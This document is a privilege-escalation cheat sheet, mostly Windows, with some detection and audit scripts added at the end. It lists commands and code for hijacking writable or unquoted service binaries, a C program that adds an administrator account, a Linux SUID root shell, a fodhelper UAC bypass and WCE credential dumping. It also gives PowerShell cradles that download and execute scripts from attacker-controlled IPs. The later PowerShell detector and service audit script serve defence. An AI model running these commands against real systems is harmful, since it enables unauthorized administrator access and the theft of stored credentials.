Windows Escalation
Imagine we have a program that runs with SYSTEM privileges and uses a binary that we can read and write. We can replace that binary, relaunch the program (restart the service or reboot), and our replacement executes with those privileges:
>icacls ServiioService.exe
//see that the file is NTAuth
make a c file called useradd.c
then convert to exe
> i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
> move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"
> net stop Serviio
>wmic service where caption="Serviio" get name, caption, state, startmode
>shutdown /r /t 0
>net localgroup Administrators
//should see our user "evil"
Batch scripts (.bat):
This is a legacy Windows scripting language. It has since been overshadowed by VBS and PowerShell, but it still works just fine and is easy to use. A sample Batch script to open cmd:
START cmd.exe
Learn more at
Unquoted Paths:
For an unquoted service path such as C:\Program Files\My Program\My Service\service.exe, Windows will attempt to run an executable from the following paths, in order (any of the first three that does not exist yet could be created, if its directory is writable, and would run in place of the real binary):
C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My Service\service.exe
USBPcap:
>driverquery /v
//shows USBPcap as a driver
# searchsploit USBPcap
C:\Program Files\USBPcap> type USBPcap.inf
//checking whether the installed version matches the searchsploit result
//we then compile it for windows and run it
System info (or sysinfo):
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
List Processes:
tasklist /SVC
Network Info:
ipconfig /all
route print
netstat -ano
Firewall:
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all
Scheduled tasks:
schtasks /query /fo LIST /v
Installed apps and patch levels:
wmic product get name, version, vendor
wmic qfe get Caption, Description, HotFixID, InstalledOn
Read/write files:
accesschk.exe -uws "Everyone" "C:\Program Files"
powershell Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
Mounted Disks:
mountvol
driver enum:
powershell driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}
Fast privesc checks (looking to see whether AlwaysInstallElevated is enabled, i.e. set to 1, under both keys):
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
Check enabled services:
net start
or:
wmic service where 'Caption like "Remote%" and started=true' get Caption
reg query HKEY_CURRENT_USER\Software\Administrator\WinSCP
Run a file as another user with PowerShell (the echo lines below are typed in cmd.exe, so the $ variables are written literally into the script):
echo $username = '<username>' > runas.ps1
echo $securePassword = ConvertTo-SecureString "<password>" -AsPlainText -Force >> runas.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1
echo Start-Process C:\Users\User\AppData\Local\Temp\backdoor.exe -Credential $credential >> runas.ps1
PowerUp and msf can do this
If we can write to the service binary directory
#net localgroup "Remote Desktop Users" <username> /add
Adding admin group:
#net localgroup "Administrators" <username> /add
Groups:
TelnetClients
Remote Desktop Users
Administrators
suid.c (Linux):
#define _GNU_SOURCE  /* setresuid is a GNU extension */
#include <unistd.h>  /* setresuid */
#include <stdlib.h>  /* system */
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
# Compile
gcc suid.c -o suid
useradd.c (Windows):
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
int main () {
int i;
i = system("net user /add && net localgroup administrators /add");
return 0;
}
#Compile
i686-w64-mingw32-gcc -o useradd.exe useradd.c
Add a user: net user /add
Add a user to a group: #net localgroup "Remote Desktop Users" /add
Going from Admin user to High Integrity Admin (able to run more commands without UAC stopping us):
//check current group
>whoami /groups
//escalate then check again
>powershell.exe Start-Process cmd.exe -Verb runAs
Windows 10 build 1709:
>C:\Windows\System32\fodhelper.exe
>cd C:\Tools\privilege_escalation\SysinternalsSuite
>sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe
//check that autoelevate is set to true
//if so then look at pages 546-554
Windows Credentials Editor (WCE) is a security tool that allows one to perform several attacks to obtain clear text passwords and hashes from a compromised Windows host. Among other things, WCE can steal NTLM credentials from memory and dump cleartext passwords stored by Windows authentication packages installed on the target system such as msv1_0.dll, kerberos.dll, and digest.dll.
C:>wce -w
SessionGopher, a FireEye PowerShell (.ps1) tool that searches a system for saved passwords (telnet, WinSCP, RDP, etc.):
//download tool to kali
#wget https://raw.githubusercontent.com/fireeye/SessionGopher/master/SessionGopher.ps1
//Set up http server to transfer file and run it on remote target
#python -m SimpleHTTPServer 80
powershell.exe -nop -ep bypass -C iex (New-Object Net.Webclient).DownloadString('http://192.168.13.71/SessionGopher.ps1'); Invoke-SessionGopher -Thorough
Powershell grab and run a ps1 file:
PS>IEX (New-Object Net.WebClient).downloadString('http://10.10.14.20:8888/Sherlock.ps1')
or remotely (you might have to URL-encode it if you run it from the browser):
C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://IP:80/ms16032.ps1')"
//great priv esc sheet
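The download cradles above are also what a defender hunts for in process-creation logs. Added detection example, not from the original page: it scores a command line (e.g. the CommandLine field of Sysmon Event 1 or Security Event 4688) against the traits those cradles share; the sample lines, the two-indicator threshold and the 192.0.2.10 address are constructed for the demo.

```powershell
# Added detection example (not from the original page): scores a process command line, as
# logged by Sysmon Event 1 or Security Event 4688, for the download-cradle traits shown above.
# Threshold and sample lines are constructed for the demo; tune them against your own baseline.
$Indicators = @(
    @{ Name = 'ExecPolicyBypass';  Regex = '-(ep|exec|executionpolicy)\s+bypass' },
    @{ Name = 'NoProfile';         Regex = '\s-nop\b' },
    @{ Name = 'WebClientDownload'; Regex = 'net\.webclient.*downloadstring' },
    @{ Name = 'InvokeExpression';  Regex = '\b(iex|invoke-expression)\b' },
    @{ Name = 'RawIpUrl';          Regex = 'https?://\d{1,3}(\.\d{1,3}){3}' }
)

function Test-DownloadCradle {
    param([string]$CommandLine)
    # -match is case-insensitive by default, so IEX / iex and Bypass / bypass all hit
    $hits = @($Indicators | Where-Object { $CommandLine -match $_.Regex } | ForEach-Object { $_.Name })
    [pscustomobject]@{
        Suspicious  = ($hits.Count -ge 2)   # a single trait such as -nop is common in benign admin scripts
        Indicators  = ($hits -join ',')
        CommandLine = $CommandLine
    }
}

# Constructed samples: the first two mirror the cradles on this page (192.0.2.10 is a
# documentation address), the third is a benign scheduled script that must not alert.
$Samples = @(
    'powershell.exe -nop -ep bypass -C iex (New-Object Net.Webclient).DownloadString(''http://192.0.2.10/SessionGopher.ps1''); Invoke-SessionGopher -Thorough',
    'C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString(''http://192.0.2.10:80/ms16032.ps1'')"',
    'powershell.exe -NoProfile -File C:\Scripts\backup.ps1'
)
$Samples | ForEach-Object { Test-DownloadCradle $_ } | Format-Table Suspicious, Indicators, CommandLine -AutoSize
```

On a live host, feed real CommandLine values from Get-WinEvent into Test-DownloadCradle instead of the constructed samples.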
Unquoted service path:
If a service or scheduled job runs a command whose path is unquoted and contains spaces, a file placed at one of the intermediate paths gets picked up first.
ex:
c:\Program Files (x86)\Canon\IJ Scan Utility\SETEVENT.exe
We could then plant a Program.exe or an IJ.exe there.
Search for unquoted service paths:
>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
//manual check for an unquoted service path by checking the service itself
>sc qc <service name>
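An added audit script, not from the original page, that covers the Serviio-style writable service binary at the top of the page, the read/write file checks, and both unquoted service path sections in one pass: it lists services whose binary a low-privilege principal can overwrite, and unquoted paths whose intermediate candidates (C:\Program.exe and so on) sit in a directory such a principal can create files in. It assumes PowerShell 3+ for Get-CimInstance, and the principal list is an assumption to extend for your environment.

```powershell
# Added audit example (not from the original page): lists services whose binary can be
# modified by low-privilege principals, and unquoted service paths whose intermediate
# "C:\Program.exe"-style candidates sit in a directory those principals can create files in.
# Run elevated so every ACL is readable. The principal list is an assumption; extend as needed.
$LowPriv = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
             'NT AUTHORITY\INTERACTIVE', "$env:USERDOMAIN\$env:USERNAME")
# CreateFiles (= WriteData) is the bit that matters: Modify and FullControl include it, while
# the broader Write mask would also flag C:\, where Users may create folders but not files.
$CreateFiles = [System.Security.AccessControl.FileSystemRights]::CreateFiles

function Test-LowPrivCanCreateFiles([string]$Path) {
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $LowPriv -contains $ace.IdentityReference.Value -and
            (($ace.FileSystemRights -band $CreateFiles) -ne 0)) { return $true }
    }
    return $false
}

# Split a service's PathName into the binary and whether it was quoted. For unquoted
# paths the binary is assumed to end at the first " -x" / " /x" style argument.
function Get-ServiceBinary([string]$PathName) {
    if ($PathName -match '^"([^"]+)"') { return @{ Path = $Matches[1]; Quoted = $true } }
    return @{ Path = ($PathName -split '\s+[-/]')[0].Trim(); Quoted = $false }
}

# The lookups Windows performs for an unquoted path with spaces, in order, before the real
# binary: "C:\Program.exe", "C:\Program Files\My.exe", ... (.exe is appended by CreateProcess).
function Get-UnquotedCandidates([string]$Path) {
    $parts = $Path -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) { ($parts[0..($i - 1)] -join ' ') + '.exe' }
}

foreach ($svc in Get-CimInstance Win32_Service | Where-Object { $_.PathName }) {
    $bin = Get-ServiceBinary $svc.PathName
    if (Test-LowPrivCanCreateFiles $bin.Path) {
        "[WRITABLE BINARY] $($svc.Name): $($bin.Path)"
    }
    if (-not $bin.Quoted -and $bin.Path -match ' ' -and $bin.Path -notlike "$env:SystemRoot\*") {
        foreach ($cand in Get-UnquotedCandidates $bin.Path) {
            if (Test-LowPrivCanCreateFiles (Split-Path -Path $cand -Parent)) {
                "[UNQUOTED PATH] $($svc.Name): $cand could be planted"
            }
        }
    }
}
```

ACEs expressed with generic access masks (large raw values rather than named FileSystemRights) are not decoded here and would be missed, so treat an empty result as a first pass rather than a clean bill of health.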